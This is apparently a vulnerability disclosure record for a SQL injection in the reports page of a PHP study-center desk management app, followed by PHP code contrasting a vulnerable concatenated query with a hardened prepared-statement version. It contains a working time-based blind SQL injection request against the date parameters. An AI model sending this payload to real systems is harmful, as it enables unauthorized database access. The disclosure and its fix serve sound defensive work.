| Field | Value |
|---|---|
| Title | Student Study Center Desk Management System reports SQL Injection Vulnerability |
| Description | A SQL injection vulnerability has been discovered in the reports function of Student Study Center Desk Management System. Remote attackers can send crafted requests to the target server to exploit this vulnerability. The vulnerable URI is `GET /php-sscdms/admin/?page=reports&date_from=2023-02-17&date_to=2023-03-17`, and `date_from` and `date_to` are the injectable parameters.<br>Below is an effective PoC using time-based blind injection:<br>`GET /php-sscdms/admin/?page=reports&date_from=2023-02-17&date_to=2023-03-17' AND (SELECT 2100 FROM (SELECT(SLEEP(5)))FWlC) AND 'bvcx'='bvcx HTTP/1.1`<br>The server responds after 5 s, which proves the injection. |
| Source | https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
| User | WWesleywww (UID 43117) |
| Submission | 03/17/2023 10:36 (3 years ago) |
| Moderation | 03/17/2023 12:44 (2 hours later) |
| Status | Accepted |
| VulDB entry | 223327 [SourceCodester Student Study Center Desk Management System 1.0 Report date_from/date_to sql injection] |
| Points | 20 |
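The submission does not show the application's source. As an added illustration (not the project's own code; the table name `student_logs`, the column `date_created`, and the `$pdo` connection are assumptions), the snippet below contrasts the string-concatenated query pattern that makes `date_from`/`date_to` injectable with a hardened version that validates both values as `YYYY-MM-DD` dates and binds them through a PDO prepared statement.

```php
<?php
// Added example: assumed shape of the reports query, not the project's code.
// Table and column names (student_logs, date_created) are hypothetical.

/** Vulnerable pattern: request values are pasted straight into the SQL text. */
function reports_vulnerable(mysqli $db, string $date_from, string $date_to)
{
    // A quote inside either value closes the string literal, so whatever
    // follows it (in the PoC, a SLEEP(5) subquery) becomes part of the query.
    $sql = "SELECT * FROM student_logs "
         . "WHERE DATE(date_created) BETWEEN '{$date_from}' AND '{$date_to}'";
    return $db->query($sql);
}

/** Accept only a real calendar date written exactly as YYYY-MM-DD. */
function valid_ymd(string $value): bool
{
    $d = DateTime::createFromFormat('Y-m-d', $value);
    // createFromFormat() tolerates trailing characters and overflowed days
    // (e.g. 2023-02-31), so re-format and compare to reject both cases.
    return $d !== false && $d->format('Y-m-d') === $value;
}

/** Hardened version: validate first, then bind through a prepared statement. */
function reports_hardened(PDO $pdo, string $date_from, string $date_to): array
{
    if (!valid_ymd($date_from) || !valid_ymd($date_to)) {
        http_response_code(400);
        return [];   // the PoC value never reaches the database
    }
    // Placeholders keep the query text fixed; the values travel separately,
    // so a quote in the input cannot alter the SQL structure.
    $stmt = $pdo->prepare(
        'SELECT * FROM student_logs WHERE DATE(date_created) BETWEEN :from AND :to'
    );
    $stmt->execute([':from' => $date_from, ':to' => $date_to]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Wiring from the reports page: parameters come from the query string.
$from = $_GET['date_from'] ?? '';
$to   = $_GET['date_to'] ?? '';
// $rows = reports_hardened($pdo, $from, $to);   // $pdo is an assumed PDO connection
```

With the validation in place, the PoC value for `date_to` is rejected with HTTP 400 before any query runs, and even an unvalidated value could not change the statement's structure once it is bound as a parameter.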